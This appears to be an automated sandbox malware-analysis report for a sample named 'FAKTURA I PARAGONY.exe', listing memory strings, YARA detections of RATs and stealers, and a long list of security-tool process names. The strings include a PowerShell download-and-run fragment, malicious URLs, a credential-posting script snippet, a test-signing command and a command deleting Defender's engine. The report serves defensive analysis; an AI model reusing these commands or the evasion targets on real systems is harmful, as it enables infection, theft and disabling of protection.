    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: f4&cyh
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: zirhm
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: |o9${
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [(;besk
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ~vn[[pf
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: un fwc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: *=<l[
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [g+qg
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 4r#xc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: .1".vf
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: <fz_d
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: egn7cli(
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: lun55
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: tpab[
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: nrt;=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [y(*~
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: p%:u0
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: n[p ojsjj
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ?{-gw
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: n}e;bz
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: m}r.g
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: atj$z<)
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: i1xb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: e>`])
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0zcwc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: nhr78x
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ##db~b
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: @i{yhgx
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: -9|[3
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: k4tly
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 'lca!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: d%dw&{"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ]zg,
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: *u}dx
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: v4~m@
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: c<+np%dszx
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: mr]y5
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: @-]^z
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ge[u8&
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: wf61zs
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ja^ze
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: -+j'=q
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 7]</^mv
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $.ajax({url:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [$.ajax({url:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ,type:"post",datatype:"html",data:{email:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ,password:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ,typeofemail:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [iex(
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: new-objectnet.webclient).downloadstring(
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !!#trojan:bat/cryptrepldow.ad2!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !!#trojan:win32/downloader.pk4!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !tart""%windir%\sys!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [!tart""%windir%\sys!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !em32\cm!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !p.exe/s"!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !"!%systemroot%\system32\ieframe.dll
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !!#trojan:win32/downloader.pk5!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !"!%systemroot%\system32\shell32.dll
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "!#scpt:trojan:html/phish.pyhj1!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: window.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: zwindow.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "!#script:pws:html/phish_paypalmsg1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: paypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: zpaypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "!#tel:scpt:trojan:win32/kovter!lnk
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: z\appdata\local\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: .bat.\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #!#script:html/techbrolo.g!alertfunc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: <scripttype="text/javascript">settimeout(function(){alert("
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: y<scripttype="text/javascript">settimeout(function(){alert("
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ")},2e3)</script>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $!#scpt:browsermodifier:win32/veenine
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: iexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: xiexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: a-z&from=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: )&ts=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: xldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $!#scpt:o97m/cve-2017-11882.rxrop!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: >6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: x>6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841*bhga{*
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $!#trojandownloader:vbs/powdown.d!ms1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: <script>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: x<script>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: document.url;document.write('<hta:application
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0icon="'+
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: +'">');</script>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: %!#scpt:exploit:o97m/cve-2017-0199.jc1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: target="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: wtarget="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: %!#trojandownloader:o97m/silkie.c!pra3
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: eregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: weregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe Code function: 34_2_00007FF7EDDE8ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

    Lowering of HIPS / PFW / Operating System Security Settings:

    Yara detected LimeRAT
    Source: Yara match File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    May enable test signing (to load unsigned drivers)
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
    Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpBinary or memory string: KavPFW.EXE
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: MSMPENG.EXE
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpBinary or memory string: \kav.exe
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpBinary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
    Source: MpSigStub.exe, 00000023.00000003.6283231817.0000028BD6AFE000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: avkservice.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: virusutilities.exe
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpBinary or memory string: McAfee.com\VSO\Mcshield.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.manifest.|!\SavService.exe
    Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: k7rtscan.exe
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: SPIDERNT.EXE
    Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmpBinary or memory string: msascui.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: mcagent.exe
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: ICESWORD.EXE
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: avkproxy.exe
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpBinary or memory string: AyAgent.aye
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpBinary or memory string: AVGcsrvx.exe
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: RC:\Program Files\Wireshark\wireshark.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: AVP.EXE
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpBinary or memory string: bdss.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: sbamsvc.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: Vsserv.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: IceSword.exe
    Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: clamwin.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: kvxp.kxp
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: fsma32.exe
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: acs.exe
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: Ravmond.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: avp.exe
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: 360safe.exe
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpBinary or memory string: RavTask.exe
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: Wireshark.exe
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpBinary or memory string: 360Safe.exe
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: KAV32.exe
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpBinary or memory string: c:\123.exe
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpBinary or memory string: *.jpg.|!\SavService.exe
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: avgnt.exe
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpBinary or memory string: \vipre business agent\sbamsvc.exe
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: a2guard.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: mbam.exe
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: (\avp.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: FSMB32.EXE
    Source: MpSigStub.exe, 00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: avktray.exe
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: Regshot.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: nod32kui.exe
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpBinary or memory string: KPFW32.EXE
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpBinary or memory string: mcshield.exe
    Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmpBinary or memory string: icesword.exe
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpBinary or memory string: avgui.exe
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\123.EXE
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpBinary or memory string: \App Paths\360Safe.exe
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpBinary or memory string: AVGcmgr.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: fsav.exe
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpBinary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpBinary or memory string: "\vipre business agent\sbamsvc.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: onlinent.exe
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpBinary or memory string: \MsMpEng.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: FSAV32.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: cmdagent.exe
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: avguard.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: fpwin.exe
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: zlclient.exe
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: avgtray.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: McShield.exe
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpBinary or memory string: RImage File Execution Options\MSMPENG.exe
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: TmPfw.exe
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpBinary or memory string: regedit.com
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpBinary or memory string: KVMonXP.kxp
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpBinary or memory string: procexp.exe
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpBinary or memory string: %installlocation%\msmpeng.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: license.rtf.|!\SavService.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: k7tsecurity.exe
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpBinary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpBinary or memory string: Mcshield.exe
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: regmon.exe

    Stealing of Sensitive Information:

    Yara detected Snake Keylogger
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Evrial Stealer
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Mini RAT
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Koadic
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Generic Dropper
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
